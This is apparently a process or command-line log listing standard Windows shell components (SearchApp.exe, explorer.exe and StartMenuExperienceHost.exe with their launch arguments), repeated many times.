C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
